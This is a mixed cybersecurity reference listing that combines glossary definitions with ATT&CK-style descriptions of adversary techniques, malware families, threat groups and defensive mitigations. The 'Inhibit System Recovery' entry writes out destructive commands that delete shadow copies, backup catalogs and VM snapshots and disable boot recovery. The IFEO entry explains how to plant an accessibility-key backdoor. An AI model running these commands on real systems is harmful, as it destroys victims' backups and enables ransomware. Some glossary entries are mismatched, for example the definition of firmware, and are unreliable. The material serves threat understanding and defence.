Definition: The person receiving a product or service and third-parties (e.g., other IoT product developers, independent researchers, media and consumer organizations) who have an interest in the IoT product, its components, data, use, assumptions, risks, vulnerabilities, assessments, and/or mitigations.

Term: block size
Definition: For a given block cipher, the fixed length of the input (or output) bit strings.

Term: controlled space
Definition: Three-dimensional space surrounding information system equipment, within which unauthorized individuals are denied unrestricted access and are either escorted by authorized individuals or are under continuous physical or electronic surveillance.

Term: media
Definition: Physical devices or writing surfaces including but not limited to, magnetic tapes, optical disks, magnetic disks, Large-scale integration (LSI) memory chips, printouts (but not including display media) onto which information is recorded, stored, or printed within an information system.

Name: RawDisk
Type: tool
Description: RawDisk is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.

Term: key-establishment key pair
Definition: A private key and its corresponding public key; a key pair is used with an asymmetric-key (public-key) algorithm.

Term: Request for Comments
Definition: A Request For Comments is a formal standards-track document developed in working groups within the Internet Engineering Task Force (IETF).

Term: degauss
Definition: To reduce the magnetic flux to virtual zero by applying a reverse magnetizing field. Also called demagnetizing.

Term: Sequence
Definition: An ordered list of quantities.

Name: Active Directory Configuration
Type: course-of-action
Description: Implement robust Active Directory (AD) configurations using group policies to secure user accounts, control access, and minimize the attack surface. AD configurations enable centralized control over account settings, logon policies, and permissions, reducing the risk of unauthorized access and lateral movement within the network. This mitigation can be implemented through the following measures:

Account Configuration:

- Implementation: Use domain accounts instead of local accounts to leverage AD’s centralized management, including group policies, auditing, and access control.
- Use Case: For IT staff managing shared resources, provision domain accounts that allow IT teams to log in centrally, reducing the risk of unmanaged, rogue local accounts on individual machines.

Interactive Logon Restrictions:

- Implementation: Configure group policies to restrict interactive logons (e.g., direct physical or RDP logons) for service accounts or privileged accounts that do not require such access.
- Use Case: Prevent service accounts, such as SQL Server accounts, from having interactive logon privileges. This reduces the risk of these accounts being leveraged for lateral movement if compromised.

Remote Desktop Settings:

- Implementation: Limit Remote Desktop Protocol (RDP) access to specific, authorized accounts. Use group policies to enforce this, allowing only necessary users to establish RDP sessions.
- Use Case: On sensitive servers (e.g., domain controllers or financial databases), restrict RDP access to administrative accounts only, while all other users are denied access.

Dedicated Administrative Accounts:

- Implementation: Create domain-wide administrative accounts that are restricted from interactive logons, designed solely for high-level tasks (e.g., software installation, patching).
- Use Case: Create separate administrative accounts for different purposes, such as one set of accounts for installations and another for managing repository access. This limits exposure and helps reduce attack vectors.

Authentication Silos:

- Implementation: Configure Authentication Silos in AD, using group policies to create access zones with restrictions based on membership, such as the Protected Users security group. This restricts access to critical accounts and minimizes exposure to potential threats.
- Use Case: Place high-risk or high-value accounts, such as executive or administrative accounts, in an Authentication Silo with extra controls, limiting their exposure to only necessary systems. This reduces the risk of credential misuse or abuse if these accounts are compromised.

**Tools for Implementation**:

- Active Directory Group Policies: Use Group Policy Management Console (GPMC) to configure, deploy, and enforce policies across AD environments.
- PowerShell: Automate account configuration, logon restrictions, and policy application using PowerShell scripts.
- AD Administrative Center: Manage Authentication Silos and configure high-level policies for critical user groups within AD.

Term: common carrier
Definition: In a telecommunications context, a telecommunications company that holds itself out to the public for hire to provide communications transmission services.
Note: In the United States, such companies are usually subject to regulation by federal and state regulatory commissions.

Term: Synchronization Protocols
Definition: Protocols that allow users to view, modify, and transfer/update data between a cell phone and personal computer.

Term: trust anchor
Definition: An authoritative entity represented by a public key and associated data (see RFC 5914).

Term: likelihood
Definition: A weighted factor based on a subjective analysis of the probability that a given threat is capable of exploiting a given vulnerability or a set of vulnerabilities.

Term: Formatting Function
Definition: The function that transforms the payload, associated data, and nonce into a sequence of complete blocks.

Term: <strong>client</strong>
Definition: A function that uses the PKI to obtain certificates and validate certificates and signatures. Client functions are present in CAs and end entities. Client functions may also be present in entities that are not certificate holders. That is, a system or user that verifies signatures and validation paths is a client, even if it does not hold a certificate itself. See section 2.4.

Term: SHA-1
Definition: A hash function specified in FIPS 180-2, the Secure Hash Standard.

Term: Virtual Machine (VM)
Definition: A virtual data processing system that appears to be at the disposal of a particular user but whose functions are accomplished by sharing the resources of a real data processing system

Name: Token Impersonation/Theft
Type: attack-pattern
Description: Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`. The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.

An adversary may perform Token Impersonation/Theft when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.

When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally Create Process with Token using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. Token Impersonation/Theft is also distinct from Make and Impersonate Token in that it refers to duplicating an existing token, rather than creating a new one.

Term: information system security plan
Definition: See System Security Plan.

Term: Reference
Definition: Relationships between elements of two documents that are recorded in a NIST IR 8278A-compliant format and shared by the OLIR Catalog. There are three types of OLIRs: concept crosswalk, set theory relationship mapping, and supportive relationship mapping.

Term: <em>|x|</em>
Definition: The absolute value of x.

Term: Concatenation
Definition: The concatenation of two bit strings <i>X</i> and <i>Y</i>.

Term: personally identifiable information processing permissions
Definition: The requirements for how personally identifiable information can be processed or the conditions under which personally identifiable information can be processed.

Term: Industrial Internet of Things
Definition: The sensors, instruments, machines, and other devices that are networked together and use Internet connectivity to enhance industrial and manufacturing business processes and applications.

Term: Duplicate Digital Evidence
Definition: A duplicate is an accurate digital reproduction of all data objects contained on the original physical item and associated media (e.g., flash memory, RAM, ROM).

Term: approval to operate
Definition: The official management decision given by a senior organizational official to authorize operation of an information system and to explicitly accept the risk to organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, and the Nation based on the implementation of an agreed-upon set of security controls.

Name: TeamPCP Cloud Stealer
Type: malware
Description: The TeamPCP Cloud Stealer is a comprehensive filesystem credential stealer that can harvest, encrypt, and exfiltrate credentials from over 50 sensitive file paths across CI/CD, cloud, developer tooling, and container environments. The TeamPCP Cloud Stealer was the primary payload used by TeamPCP in March 2026 during early stages of a cascading supply chain campaign targeting CI/CD workflows.

Term: senior information security officer (SISO)
Definition: See Senior Agency Information Security Officer (SAISO)

Term: Test, Training, and Exercise (TT&E) Plan
Definition: A plan that outlines the steps to be taken to ensure that personnel are trained in their IT plan roles and responsibilities, IT plans are exercised to validate their viability, and IT components or systems are tested to validate their operability in the context of an IT plan.

Term: assurance_time
Definition: The time at which assurance of possession is obtained.

Term: Federal Committee on Statistical Methodology
Definition: An interagency committee dedicated to improving the quality of Federal statistics. The FCSM was created by the Office of Management and Budget (OMB) to inform and advise OMB and the Interagency Council on Statistical Policy (ICSP) on methodological and statistical issues that affect the quality of Federal data.

Name: AutoHotKey & AutoIT
Type: attack-pattern
Description: Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.

Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as Phishing payloads.

These scripts may also be compiled into self-contained executable payloads (`.exe`).

Term: Personal Information
Definition: Information that can be used to distinguish or trace an individual’s identity, either alone or when combined with other information that is linked or linkable to a specific individual.

Term: security architecture
Definition: A set of physical and logical security-relevant representations (i.e., views) of system architecture that conveys information about how the system is partitioned into security domains and makes use of security-relevant elements to enforce security policies within and between security domains based on how data and information must be protected. 
Note: The security architecture reflects security domains, the placement of security-relevant elements within the security domains, the interconnections and trust relationships between the security-relevant elements, and the behavior and interactions between the security-relevant elements. The security architecture, similar to the system architecture, may be expressed at different levels of abstraction and with different scopes.

Name: PipeMon
Type: malware
Description: PipeMon is a multi-stage modular backdoor used by Winnti Group.

Name: HALFBAKED
Type: malware
Description: HALFBAKED is a malware family consisting of multiple components intended to establish persistence in victim networks.

Name: Exaramel for Windows
Type: malware
Description: Exaramel for Windows is a backdoor used for targeting Windows systems. The Linux version is tracked separately under Exaramel for Linux.

Term: RA
Definition: The process of identifying risks to agency operations (including mission, functions, image, or reputation), agency assets, or individuals by determining the probability of occurrence, the resulting impact, and additional security controls that would mitigate this impact.
Part of risk management, synonymous with risk analysis. Incorporates threat and vulnerability analyses.

Term: derived attribute value
Definition: A statement that asserts a limited identity attribute of a subscriber without containing the attribute value from which it is derived, independent of format. For example, instead of requesting the attribute “birthday,” a derived value could be “older than 18.” Instead of requesting the attribute for “physical address,” a derived value could be “currently residing in this district.” Previous versions of these guidelines referred to this construct as an “attribute reference.”

Term: adequate security
Definition: Security commensurate with the risk and the magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of information. This includes assuring that systems and applications used by the agency operate effectively and provide appropriate confidentiality, integrity, and availability, through the use of cost-effective management, personnel, operational, and technical controls.

Term: approved
Definition: Federal Information Processing Standard (FIPS) approved or NIST recommended. An algorithm or technique that is either 1) specified in a FIPS or NIST Recommendation, or 2) adopted in a FIPS or NIST Recommendation.

Term: RBG
Definition: Random Bit Generator

Name: Code Signing Certificates
Type: attack-pattern
Description: Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with. Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.

Prior to Code Signing, adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.

Term: security control and privacy control
Definition: See security control or privacy control.

Term: certificate revocation list (CRL)
Definition: A list of revoked public key certificates created and digitally signed by a Certificate Authority. See [RFC 5280].

Term: minimization
Definition: A privacy principle (FIPP) that limits an organization's creation, collection, use, processing, storage, maintaining, disseminating, or disclosing of PII to activities that are directly relevant and necessary to accomplish a legally authorized purpose, and to only maintain PII for as long as is necessary to accomplish the purpose.

Term: Cyber Threat
Definition: An event or condition that has the potential for causing asset loss and the undesirable consequences or impact from such loss.
Note: The specific causes of asset loss, and for which the consequences of asset loss are assessed, can arise from a variety of conditions and events related to adversity, typically referred to as disruptions, hazards, or threats. Regardless of the specific term used, the basis of asset loss constitutes all forms of intentional, unintentional, accidental, incidental, misuse, abuse, error, weakness, defect, fault, and/or failure events and associated conditions.

Term: Host-Based Firewall
Definition: A software-based firewall installed on a server to monitor and control its incoming and outgoing network traffic.

Name: Remsec
Type: malware
Description: Remsec is a modular backdoor that has been used by Strider and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua.

Term: memorized secret
Definition: A secret that a Claimant memorizes and uses to authenticate his or her identity. Passwords are typically character strings.

Term: nonce
Definition: A value used in security protocols that is never repeated with the same key. For example, nonces used as challenges in challenge-response authentication protocols must not be repeated until authentication keys are changed. Otherwise, there is a possibility of a replay attack. Using a nonce as a challenge is a different requirement than a random challenge because a nonce is not necessarily unpredictable.

Term: CUI program
Definition: The executive branch-wide program to standardize CUI handling by all federal agencies. The program includes the rules, organization, and procedures for CUI, established by Executive Order 13556, 32 CFR Part 2002, and the CUI Registry.

Term: leading indicator
Definition: A predictive metric that tracks events or behaviors that precede incidents.

Term: Universal Mobile Telecommunications System (UMTS)
Definition: A third-generation (3G) mobile phone technology standardized by the 3GPP as the successor to GSM.

Term: credential service provider (CSP)
Definition: A trusted entity that issues or registers Subscriber tokens and issues electronic credentials to Subscribers. The CSP may encompass Registration Authorities (RAs) and Verifiers that it operates. A CSP may be an independent third party, or may issue credentials for its own use.

Term: malware
Definition: A program that is written intentionally to carry out annoying or harmful actions, which includes Trojan horses, viruses, and worms.

Term: <em>∇ψ2m(obs);∇2ψ2m(obs)</em>
Definition: A measure of how well the observed values match the expected value. See Sections 2.11 and 3.11.

Term: party
Definition: An individual person, organization, device, or process. Used interchangeably with party.

Term: moving target defense
Definition: The concept of controlling change across multiple system dimensions in order to increase uncertainty and apparent complexity for attackers, reduce their window of opportunity, and increase the costs of their probing and attack efforts.

Term: data integrity
Definition: The property that data has not been changed, destroyed, or lost in an unauthorized or accidental manner.

Term: <em>VARIABLEn</em>
Definition: Block of data representing the value of VARIABLE for the nth iteration

Term: identify (CSF function)
Definition: Develop the organizational understanding to manage cybersecurity risk to systems, assets, data, and capabilities.

Term: Passphrase
Definition: A passphrase is a memorized secret consisting of a sequence of words or other text that a claimant uses to authenticate their identity. A passphrase is similar to a password in usage, but is generally longer for added security.

Term: Key-center environment
Definition: As used in this Recommendation, an environment in which the keys or key components needed to support cryptographically protected exchanges within one or more communicating groups are obtained from a common central source.

Term: System privacy requirement
Definition: System requirements that have privacy relevance. System privacy requirements define the protection capabilities provided by the system, the performance and behavioral characteristics exhibited by the system, and the evidence used to determine that the system privacy requirements have been satisfied.  Note: Each system privacy requirement is expressed in a manner that makes verification possible via analysis, observation, test, inspection, measurement, or other defined and achievable means.

Term: Capability, Manage and Assess Risk
Definition: The program and supporting processes to manage information security risk to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and includes: (i) establishing the context for risk-related activities; (ii) assessing risk; (iii) responding to risk once determined; and (iv) monitoring risk over time.

Name: Hikit
Type: malware
Description: Hikit is malware that has been used by Axiom for late-stage persistence and exfiltration after the initial compromise.

Term: AC
Definition: The process of granting or denying specific requests to: (i) obtain and use information and related information processing services; and (ii) enter specific physical facilities (e.g., Federal buildings, military establishments, and border-crossing entrances).

Term: assurance of integrity
Definition: Guarding against improper information modification or destruction and includes ensuring information non-repudiation and authenticity.

Term: assurance of integrity
Definition: Guarding against improper information modification or destruction; includes ensuring information non-repudiation and authenticity.

Term: outcome
Definition: Result of the performance (or non-performance) of a function or process(es).

Term: technical risk
Definition: The risk associated with the evolution of the design and the production of the system of interest affecting the level of performance necessary to meet the stakeholder expectations and technical requirements.

Name: Pisloader
Type: malware
Description: Pisloader is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by APT18 and is similar to another malware family, HTTPBrowser, that has been used by the group.

Term: likelihood
Definition: A weighted factor based on a subjective analysis of the probability that a given threat is capable of exploiting a given vulnerability

Term: authenticate
Definition: Verifying the identity of a user, process, or device, often as a prerequisite to allowing access to a system’s resources

Term: Fault tolerance
Definition: The ability of a system to continue to run when one or more component(s) of the system fails.

Term: key pair
Definition: A public key and its corresponding private key; a key pair is used with a public key algorithm.

Name: Diavol
Type: malware
Description: Diavol is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. The Diavol Ransomware-as-a Service (RaaS) program is managed by Wizard Spider and it has been observed being deployed by Bazar.

Name: HTML Smuggling
Type: attack-pattern
Description: Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.

Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as <code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. Deobfuscate/Decode Files or Information), potentially bypassing content filters.

For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.

Name: Threat Intelligence Program
Type: course-of-action
Description: A Threat Intelligence Program enables organizations to proactively identify, analyze, and act on cyber threats by leveraging internal and external data sources. The program supports decision-making processes, prioritizes defenses, and improves incident response by delivering actionable intelligence tailored to the organization's risk profile and operational environment. This mitigation can be implemented through the following measures:

Establish a Threat Intelligence Team:

- Form a dedicated team or assign responsibility to existing security personnel to collect, analyze, and act on threat intelligence.

Define Intelligence Requirements:

- Identify the organization’s critical assets and focus intelligence gathering efforts on threats targeting these assets.

Leverage Internal and External Data Sources:

- Collect intelligence from internal sources such as logs, incidents, and alerts.
Subscribe to external threat intelligence feeds, participate in ISACs, and monitor open-source intelligence (OSINT).

Implement Tools for Automation:

- Use threat intelligence platforms (TIPs) to automate the collection, enrichment, and dissemination of threat data.
- Integrate threat intelligence with SIEMs to correlate IOCs with internal events.

Analyze and Act on Intelligence:

- Use frameworks like MITRE ATT&CK to map intelligence to adversary TTPs.
- Prioritize defensive measures, such as patching vulnerabilities or deploying IOCs, based on analyzed threats.

Share and Collaborate:

- Share intelligence with industry peers through ISACs or threat-sharing platforms to enhance collective defense.

Evaluate and Update the Program:

- Regularly assess the effectiveness of the threat intelligence program.
- Update intelligence priorities and capabilities as new threats emerge.

*Tools for Implementation*

Threat Intelligence Platforms (TIPs):

- OpenCTI: An open-source platform for structuring and sharing threat intelligence.
- MISP: A threat intelligence sharing platform for sharing structured threat data.

Threat Intelligence Feeds:

- Open Threat Exchange (OTX): Provides free access to a large repository of threat intelligence.
- CIRCL OSINT Feed: A free source for IOCs and threat information.

Automation and Enrichment Tools:

- TheHive: An open-source incident response platform with threat intelligence integration.
- Yeti: A platform for managing and structuring knowledge about threats.

Analysis Frameworks:

- MITRE ATT&CK Navigator: A tool for mapping threat intelligence to adversary behaviors.
- Cuckoo Sandbox: Analyzes malware to extract behavioral indicators.

Community and Collaboration Tools:

- ISAC Memberships: Join industry-specific ISACs for intelligence sharing.
- Slack/Discord Channels: Participate in threat intelligence communities for real-time collaboration.

Name: Image File Execution Options Injection
Type: attack-pattern
Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g notepad.exe</code>).

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable></code> where <code>&lt;executable&gt;</code> is the binary on which the debugger is attached.

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\</code>.

Similar to Accessibility Features, on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with Remote Desktop Protocol will cause the "debugger" program to be executed with SYSTEM privileges.

Similar to Process Injection, these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.

Malware may also use IFEO to impair defenses by registering invalid debuggers that redirect and effectively disable various system and security applications.

Term: cryptographic key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines its operation in such a way that an entity with knowledge of the key can reproduce or reverse the operation, while an entity without knowledge of the key cannot. Examples include:

• the transformation of plaintext data into ciphertext data,
• the transformation of ciphertext data into plaintext data,
• the computation of a digital signature from data,
• the verification of a digital signature,
• the computation of an authentication code from data,
• the computation of a shared secret that is used to derive keying material.

Term: certification
Definition: Third-party attestation related to an object of conformity assessment, with the exception of accreditation.

Term: Sandbox
Definition: Isolating each guest OS from the others and restricting what resources they can access and what privileges they have.

Term: acquirer
Definition: Organization or entity that acquires or procures a product or service.

Name: Credentials In Files
Type: attack-pattern
Description: Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

It is possible to extract passwords from backups or saved virtual machines through OS Credential Dumping. Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.

In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files. They may also be found as parameters to deployment commands in container logs. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.

Term: RA
Definition: The process of identifying risks to agency operations (including mission, functions, image, or reputation), agency assets, or individuals by determining the probability of occurrence, the resulting impact, and additional security controls that would mitigate this impact. Part of risk management, synonymous with risk analysis. Incorporates threat and vulnerability analyses.

Name: Mimikatz
Type: tool
Description: Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.

Term: Key Management Service
Definition: A key management service is a function performed for or by an

Term: information management
Definition: The planning, budgeting, manipulating, and controlling of information throughout its life cycle.

Term: parameter
Definition: See organization-defined control parameter.

Term: IAL
Definition: A category that conveys the degree of confidence that the applicant’s claimed identity is their real identity.

Term: security control assessment
Definition: The action of evaluating, estimating, or judging against defined criteria. Different types of assessment (i.e., qualitative, quantitative, and semi-quantitative) are used to assess risk. Some types of assessment yield results.

Term: clear
Definition: A method of Sanitization by applying logical techniques to sanitizedata in all user-addressable storage locations for protection againstsimple non-invasive data recovery techniques using the sameinterface available to the user; typicallyapplied through the standard read and write commands to the storage device, such as by rewritingwith a new value or using a menu option to reset the device to thefactory state(where rewriting is not supported).

Term: Facilitator
Definition: A person that leads a discussion among exercise participants.

Term: Seed
Definition: A string of bits that is used to initialize a DRBG. Also just called a Seed.

Term: organization-defined control parameter
Definition: See organization-defined parameter.

Term: element
Definition: Organizations, departments, facilities, or personnel responsible for a particular systems security engineering activity conducted within an engineering process (e.g., operations elements, logistics elements, maintenance elements, and training elements).

Name: Cobalt Group
Type: intrusion-set
Description: Cobalt Group is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. Cobalt Group has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims. Reporting indicates there may be links between Cobalt Group and both the malware Carbanak and the group Carbanak.

Name: Winnti for Linux
Type: malware
Description: Winnti for Linux is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including Winnti Group. The Windows variant is tracked separately under Winnti for Windows.

Term: Risk Adaptive (Adaptable) Access Control
Definition: Access privileges are granted based on a combination of a user’s identity, mission need, and the level of security risk that exists between the system being accessed and a user. RAdAC will use security metrics, such as the strength of the authentication method, the level of assurance of the session connection between the system and a user, and the physical location of a user, to make its risk determination.

Name: GreyEnergy
Type: malware
Description: GreyEnergy is a backdoor written in C and compiled in Visual Studio. GreyEnergy shares similarities with the BlackEnergy malware and is thought to be the successor of it.

Term: Full node
Definition: A blockchain node that stores the blockchain data, passes along the data to other nodes, and ensures that newly added blocks are valid and authentic.

Term: trustworthiness
Definition: The attribute of a person or enterprise that provides confidence to others of the qualifications, capabilities, and reliability of that entity to perform specific tasks and fulfill assigned responsibilities.

Term: Additional input
Definition: Information known by two parties that is cryptographically bound to the keying material being protected using the encryption operation.

Term: JSON Web Token
Definition: A data exchange format made of a header, payload, and signature where the header and the payload take the form of JSON objects. They are encoded and concatenated with the aggregate being signed to generate a signature.

Term: Permutation
Definition: An ordered (re)arrangement of the elements of a (finite) set; a function that is both a one-to-one and onto mapping of a set to itself.

Name: FRP
Type: tool
Description: FRP, which stands for Fast Reverse Proxy, is an openly available tool that is capable of exposing a server located behind a firewall or Network Address Translation (NAT) to the Internet. FRP can support multiple protocols including TCP, UDP, and HTTP(S) and has been abused by threat actors to proxy command and control communications.

Term: firmware
Definition: The material physical components of an information system.

Term: Secure Sockets Layer (SSL)
Definition: An authentication and security protocol widely implemented in browsers and web servers. TLS is defined by RFC 5246. TLS is similar to the older SSL protocol, and TLS 1.0 is effectively SSL version 3.1. NIST SP 800-52, Guidelines for the Selection and Use of Transport Layer Security (TLS) Implementations [NIST SP 800-52], specifies how TLS is to be used in government applications.

Term: Capability, Trust Management
Definition: The confidence one element has in another, that the second element will behave as expected.

Term: Cryptographic function
Definition: Cryptographic algorithms, together with modes of operation (if appropriate); for example, block ciphers, digital signature algorithms, asymmetric key-establishment algorithms, message authentication codes, hash functions, or random bit generators.

Term: beacon
Definition: Initial signal by satellite conducted when first put into mission operation in order to establish communications with command and control and report initial operating status.

Term: senior agency information security officer (SAISO)
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers.
[Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.]

Term: <em>X>> 1</em>
Definition: The bit string that results from discarding the rightmost bit of the bit string X and prepending a ‘0’ bit on the left.

Term: assessment element attribute
Definition: An item of information that is specifically applicable to an assessment element, such as the source for the assessment element or risk management level to which the element applies.

Term: Collection System
Definition: A system that collects actual state data and compares the collected actual state data to the desired state specification to find security defects.

Term: RTR
Definition: A computer that is a gateway between two networks at OSI layer 3 and that relays and directs data packets through that inter-network. The most common form of router operates on IP packets.

Term: keying material
Definition: A bit string, such that any non-overlapping segments of the string with the required lengths can be used as symmetric cryptographic keys and secret parameters, such as initialization vectors.

Term: information security architecture
Definition: An embedded, integral part of the enterprise architecture that describes the structure and behavior for an enterprise’s security processes, information security systems, personnel and organizational sub-units, showing their alignment with the enterprise’s mission and strategic plans.

Term: data intruder
Definition: A data user who attempts to disclose information about a population through identification or attribution.

Name: Sibot
Type: malware
Description: Sibot is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three Sibot variants in early 2021 during its investigation of APT29 and the SolarWinds Compromise.

Term: Cryptographic device
Definition: A physical device that performs a cryptographic function (e.g., random number generation, message authentication, digital signature generation, encryption, or key establishment). A cryptographic device must employ one or more cryptographic modules for cryptographic operations. The device may also be composed from other applications and components in addition to the cryptographic module(s). A cryptographic device may be a stand-alone cryptographic mechanism or a CKMS component.

Term: key agreement
Definition: A key-establishment procedure where resultant keying material is a function of information contributed by two or more participants, so that no party can predetermine the value of the keying material independently of the other party’s contribution.

Term: identity verification
Definition: The process of confirming or denying that a claimed identity is correct by comparing the credentials of a person requesting access with those previously proven and associated with the PIV Card or a derived PIV credential associated with the identity being claimed.

Name: SVCReady
Type: malware
Description: SVCReady is a loader that has been used since at least April 2022 in malicious spam campaigns. Security researchers have noted overlaps between TA551 activity and SVCReady distribution, including similarities in file names, lure images, and identical grammatical errors.

Term: bit string
Definition: A finite, ordered sequence of bits.

Term: system interconnection
Definition: A direct connection between two or more systems in different authorization boundaries for the purpose of exchanging information and/or allowing access to information, information services, and resources.

Term: Immutable
Definition: Data that can only be written, not modified or deleted.

Term: shared secret key
Definition: A shared secret that can be used directly as a cryptographic key in symmetric-key cryptography. It does not require additional key derivation. The shared secret key must be kept private and must be destroyed when no longer needed.

Term: SC
Definition: The characterization of information or an information system based on an assessment of the potential impact that a loss of confidentiality, integrity, or availability of such information or information system would have on organizational operations, organizational assets, individuals, other organizations, or the Nation.

Term: key establishment
Definition: The procedure that results in keying material that is shared among different parties.

Name: Inhibit System Recovery
Type: attack-pattern
Description: Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. This may deny access to available backups and recovery options.

Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of Data Destruction and Data Encrypted for Impact. Furthermore, adversaries may disable recovery notifications, then corrupt backups.

A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:

* <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>
* Windows Management Instrumentation can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>
* <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>
* <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>
* <code>REAgentC.exe</code> can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system
* <code>diskshadow.exe</code> can be used to delete all volume shadow copies on a system - <code>diskshadow delete shadows all</code> 

On network devices, adversaries may leverage Disk Wipe to delete backup firmware images and reformat the file system, then System Shutdown/Reboot to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.

On ESXi servers, adversaries may delete or encrypt snapshots of virtual machines to support Data Encrypted for Impact, preventing them from being leveraged as backups (e.g., via ` vim-cmd vmsvc/snapshot.removeall`).

Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services. In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.

Term: accreditation
Definition: Formal declaration by a designated accrediting authority (DAA) or principal accrediting authority (PAA) that an information system is approved to operate at an acceptable level of risk, based on the implementation of an approved set of technical, managerial, and procedural safeguards.

Term: Synchronization Protocols
